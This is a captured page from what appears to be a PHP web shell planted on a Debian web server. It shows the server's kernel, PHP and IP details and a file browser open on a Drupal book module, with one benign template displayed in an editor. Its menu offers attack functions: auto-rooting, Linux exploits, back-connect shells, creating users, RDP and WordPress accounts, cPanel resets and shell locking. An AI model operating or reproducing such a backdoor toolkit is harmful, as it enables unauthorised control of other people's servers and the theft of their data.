Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.251.22
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
book /
[ HOME SHELL ]
Name
Size
Permission
Action
book-all-books-block.tpl.php
686
B
-rw-r--r--
book-export-html.tpl.php
1.86
KB
-rw-r--r--
book-navigation.tpl.php
2.04
KB
-rw-r--r--
book-node-export-html.tpl.php
686
B
-rw-r--r--
book-rtl.css
214
B
-rw-r--r--
book.admin.inc
9.38
KB
-rw-r--r--
book.css
1.01
KB
-rw-r--r--
book.info
355
B
-rw-r--r--
book.install
2.28
KB
-rw-r--r--
book.js
589
B
-rw-r--r--
book.module
46.82
KB
-rw-r--r--
book.pages.inc
7.18
KB
-rw-r--r--
book.test
15.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : book-all-books-block.tpl.php
<?php /** * @file * Default theme implementation for rendering book outlines within a block. * * This template is used only when the block is configured to "show block on all * pages", which presents multiple independent books on all pages. * * Available variables: * - $book_menus: Array of book outlines keyed to the parent book ID. Call * render() on each to print it as an unordered list. * * @see template_preprocess_book_all_books_block() * * @ingroup themeable */ ?> <?php foreach ($book_menus as $book_id => $menu): ?> <div id="book-block-menu-<?php print $book_id; ?>" class="book-block-menu"> <?php print render($menu); ?> </div> <?php endforeach; ?>
Close